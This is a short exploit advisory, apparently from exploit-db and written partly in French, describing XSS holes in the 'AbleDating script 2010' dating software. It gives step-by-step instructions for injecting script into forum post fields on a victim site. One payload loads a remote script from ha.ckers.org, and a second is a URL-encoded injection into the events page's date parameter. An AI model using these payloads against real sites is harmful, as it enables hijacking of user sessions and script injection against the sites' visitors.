32 lines
No EOL
1.1 KiB
Text
32 lines
No EOL
1.1 KiB
Text
# Exploit Title: AbleDating script 2010 Critical XSS Vulnerability
|
|
# Date: 15.11.2010
|
|
# Author: Dr-mosta
|
|
# Category: webapps/0day
|
|
# Script url: http://www.abk-soft.com/matchmaking_software_demo.html
|
|
# Version: N/A
|
|
# Tested on:
|
|
# CVE :
|
|
|
|
[ EXPL0!T ]
|
|
|
|
IL vaut faut inscrire au site apres aller a la partie forum ou par le
|
|
lien : www.sitevictim.com/forum.php
|
|
aper essais de choisir un category et essais de cree un Sujet dans le forum
|
|
vous pouvez ajouté votre code xss das le titre de Poster ou Description ou Message
|
|
|
|
Exemple exploit code :
|
|
|
|
“><SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT><”
|
|
|
|
Exploit 2:
|
|
|
|
IL vaut faut inscrire au site apres l'Exploit :
|
|
(vuln): server/events_event_edit.php?events_event_edit.php?event_private=1&date=[XSS]
|
|
|
|
Exemple exploit code :
|
|
|
|
server/events_event_edit.php?event_private=1&date=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E%20%3Cinput%20style=%22visibility:%20visible;%22%20class=%22inp_lblack%20no_abk%20hasDatepicker%22%20id=%22event_date%22%20autocomplete=%22off%22%20name=%22event_date%22%20value=%2212-15-2010
|
|
|
|
Greetz = TeaM MostA , exploit-db.com
|
|
|
|
Good Luck . |